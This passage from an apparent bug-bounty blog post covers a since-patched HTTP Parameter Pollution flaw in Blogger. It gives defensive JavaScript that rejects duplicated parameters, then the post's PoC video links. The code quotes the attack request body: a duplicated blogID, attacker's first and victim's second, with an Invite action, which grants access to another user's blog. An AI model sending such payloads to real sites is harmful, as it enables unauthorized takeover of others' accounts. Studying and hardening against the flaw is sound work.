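As an added example (not Blogger's code, and not from the original post), here is how a request handler can detect the duplicated blogID and refuse the request instead of checking one value and acting on the other. The request body is the one quoted in step 1 above; the set of blogs the caller owns is constructed for the example.

```javascript
// Added example (not Blogger's code): detect HTTP Parameter Pollution in a
// form-encoded body and bind the authorization check to exactly one blogID.

// Group every value by parameter name, preserving order, so duplicates are
// visible instead of being silently collapsed to "first" or "last".
function parseFormBody(body) {
  const byName = new Map();
  for (const [name, value] of new URLSearchParams(body)) {
    if (!byName.has(name)) byName.set(name, []);
    byName.get(name).push(value);
  }
  return byName;
}

// Names that occur more than once: the ambiguity the post exploits.
function duplicatedParams(byName) {
  return [...byName.entries()].filter(([, v]) => v.length > 1).map(([k]) => k);
}

// Shows the split the post describes: a helper that returns the first value
// and one that returns the last disagree on the same request.
function firstAndLast(body, name) {
  const params = new URLSearchParams(body);
  const all = params.getAll(name);
  return { first: params.get(name), last: all.length ? all[all.length - 1] : null };
}

// Hardened handler logic: reject any duplicated parameter outright, then check
// ownership of the single blogID and return that same value for the action.
function resolveBlogId(body, ownedBlogIds) {
  const byName = parseFormBody(body);
  const dups = duplicatedParams(byName);
  if (dups.length > 0) {
    return { ok: false, reason: "duplicate parameter(s): " + dups.join(", ") };
  }
  const values = byName.get("blogID") || [];
  if (values.length !== 1) return { ok: false, reason: "blogID missing" };
  const blogId = values[0];
  if (!ownedBlogIds.has(blogId)) {
    return { ok: false, reason: "caller does not own blogID " + blogId };
  }
  return { ok: true, blogId };
}

// The polluted body quoted in the post, and a clean one for comparison.
const POLLUTED_BODY =
  "security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue" +
  "&authorsList=goldshlager19test%40gmail.com&ok=Invite";
const CLEAN_BODY =
  "security_token=attackertoken&blogID=attackerblogidvalue" +
  "&authorsList=goldshlager19test%40gmail.com&ok=Invite";
// Constructed: the blogs the calling account actually owns.
const OWNED = new Set(["attackerblogidvalue"]);

console.log("first vs last:", firstAndLast(POLLUTED_BODY, "blogID"));
console.log("polluted:", resolveBlogId(POLLUTED_BODY, OWNED));
console.log("clean:   ", resolveBlogId(CLEAN_BODY, OWNED));
```

The key design point is that the value authorized and the value acted on are the same variable; refusing duplicates up front means no later layer (framework helper, ORM, template) can pick a different element of the same parameter than the ownership check did.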
And?<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMqYXPQHslaUOvY1zluKaw7EJwMG0KmN6q9kQqCcrCfACuxkmzB28nmh3vpt0hAPycRxovTUGFGT4Km3QvXSfm9Rjz0Wl7KO5PS8IQ78L6iiKQTNA1-WeDkpM03ib3DliUfui335jqmYo/s1600/mario2gameover.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMqYXPQHslaUOvY1zluKaw7EJwMG0KmN6q9kQqCcrCfACuxkmzB28nmh3vpt0hAPycRxovTUGFGT4Km3QvXSfm9Rjz0Wl7KO5PS8IQ78L6iiKQTNA1-WeDkpM03ib3DliUfui335jqmYo/s320/mario2gameover.jpg" width="320" /></a></div><br />
<br />
<br />
<br />
PoC Video:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/AdIWl0gkynk?feature=player_embedded' frameborder='0'></iframe></div>
2. (Full video download): <a href="http://www.2shared.com/file/90mjfuab/Blogger_Get_Administrator_priv.html">http://www.2shared.com/file/90mjfuab/Blogger_Get_Administrator_priv.html</a><br /><br />(The vulnerability mentioned here has been confirmed patched by the Google Security Team very fast.)<br /><br />Best Regards,<br />Nir Goldshlager
<div></div></div>Unknownnoreply@blogger.com16